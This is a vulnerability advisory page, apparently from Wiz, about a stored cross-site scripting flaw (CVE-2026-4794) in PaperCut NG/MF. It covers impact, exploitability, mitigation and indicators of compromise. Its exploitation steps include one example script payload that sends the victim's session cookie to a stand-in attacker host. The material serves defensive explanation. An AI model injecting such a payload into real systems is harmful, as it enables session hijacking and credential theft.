CVE-2026-4794
PaperCut NG Analyse et atténuation des vulnérabilités

Aperçu

CVE-2026-4794 describes multiple stored cross-site scripting (XSS) vulnerabilities in PaperCut NG and PaperCut MF print management software affecting all versions before 25.0.10. Authenticated administrator users can inject arbitrary web script or HTML code via various UI fields in the admin interface, potentially compromising other administrators' sessions or enabling unauthorized actions within an authenticated context. The vulnerability was published on March 31, 2026, with a patch released in version 25.0.10. It carries a CVSS v3.1 base score of 4.8 (Medium) and a CVSS v4.0 base score of 2.1 (Low) (GitHub Advisory, PaperCut Bulletin).

Détails techniques

The root cause is improper neutralization of user-controllable input before it is rendered in web pages served to other users (CWE-79). Multiple UI fields within the PaperCut NG/MF administrator interface fail to sanitize input, allowing a malicious administrator to store crafted JavaScript or HTML payloads that execute in the browser context of other administrators who subsequently view the affected pages. Exploitation requires the attacker to already hold valid administrator credentials and the attack requires passive user interaction from a victim administrator (i.e., the victim must view the page containing the injected payload). No public proof-of-concept exploit code has been identified (GitHub Advisory, PaperCut Bulletin).

Impact

Successful exploitation allows an attacker with administrator-level access to hijack other administrators' authenticated sessions, perform unauthorized administrative actions on their behalf, or exfiltrate session tokens and sensitive configuration data visible within the admin UI. The scope is changed (subsequent system impact), meaning the injected script executes in the browser context of other administrators rather than just the attacker's own session, resulting in low confidentiality and low integrity impacts on the subsequent system. Availability is not directly impacted, and exploitation is constrained to the administrative interface (GitHub Advisory, PaperCut Bulletin).

Exploitabilité

There is no evidence of public proof-of-concept exploit code or active in-the-wild exploitation as of the time of publication. The EPSS score is approximately 0.044% (4th percentile), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is significantly constrained by the requirement for existing administrator credentials and passive interaction from a victim administrator (GitHub Advisory).

Étapes d’exploitation

  1. Obtain Administrator Access: Gain valid PaperCut NG/MF administrator credentials through phishing, credential stuffing, or insider access — a prerequisite for exploitation.
  2. Identify Injectable UI Fields: Log into the PaperCut admin interface and enumerate UI fields (e.g., printer names, user group descriptions, notification messages, or configuration text fields) that are rendered back to other administrators without proper sanitization.
  3. Inject Malicious Payload: Enter a crafted XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into one or more vulnerable UI fields and save the configuration.
  4. Wait for Victim Interaction: Wait for another administrator to navigate to the page containing the injected payload; the script executes automatically in their browser session (passive user interaction).
  5. Harvest Session or Perform Actions: The injected script exfiltrates the victim administrator's session cookie or performs unauthorized administrative actions (e.g., adding rogue admin accounts, modifying printer configurations) using the victim's authenticated context (GitHub Advisory, PaperCut Bulletin).

Indicateurs de compromis

  • Logs: PaperCut application logs showing unusual administrator account activity, particularly configuration changes to UI fields containing HTML or JavaScript syntax (e.g., <script>, onerror=, javascript:).
  • Network: Outbound HTTP/S requests from administrator browsers to unexpected external domains shortly after accessing the PaperCut admin interface, potentially carrying session cookie data as query parameters.
  • Logs: Web server access logs showing requests to the PaperCut admin interface from multiple administrator accounts in rapid succession or from unusual IP addresses, which may indicate session hijacking.
  • File System: No specific file-system artifacts expected, as this is a browser-side attack; however, review PaperCut's audit log for unexpected changes to printer configurations, user groups, or notification templates containing script tags.

Atténuation et solutions de contournement

PaperCut has released a patch in PaperCut NG/MF version 25.0.10; organizations should upgrade immediately (PaperCut Bulletin). As interim mitigations, restrict administrator account access to the minimum number of trusted users and enforce strong authentication (e.g., MFA) for all admin accounts. Implementing a Content Security Policy (CSP) header on the PaperCut web interface can reduce the impact of any XSS payloads by restricting script execution to trusted sources. Monitor administrator accounts for suspicious activity and review audit logs for unexpected configuration changes.

Ressources additionnelles


SourceCe rapport a été généré à l’aide de l’IA

Apparenté PaperCut NG Vulnérabilités:

Identifiant CVE

Sévérité

Score

Technologies

Nom du composant

Exploit CISA KEV

A corrigé

Date de publication

CVE-2026-82078CRITICAL9.4
  • PaperCut NG logoPaperCut NG
  • cpe:2.3:a:papercut:papercut_mf
OuiOuiAug 28, 2026
CVE-2026-81578HIGH8.8
  • PaperCut NG logoPaperCut NG
  • cpe:2.3:a:papercut:papercut_mf
OuiOuiAug 28, 2026
CVE-2026-6418MEDIUM4.6
  • PaperCut NG logoPaperCut NG
  • cpe:2.3:a:papercut:papercut_ng
NonOuiMay 05, 2026
CVE-2026-6180MEDIUM4.1
  • PaperCut NG logoPaperCut NG
  • cpe:2.3:a:papercut:papercut_mf
NonOuiMay 05, 2026
CVE-2026-4794LOW2.1
  • PaperCut NG logoPaperCut NG
  • cpe:2.3:a:papercut:papercut_mf
NonOuiMar 31, 2026

Évaluation gratuite des vulnérabilités

Évaluez votre posture de sécurité dans le cloud

Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.

Demander une évaluation

Obtenez une démo personnalisée

Prêt(e) à voir Wiz en action ?

"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
David EstlickRSSI
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
Adam FletcherChef du service de sécurité
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."
Greg PoniatowskiResponsable de la gestion des menaces et des vulnérabilités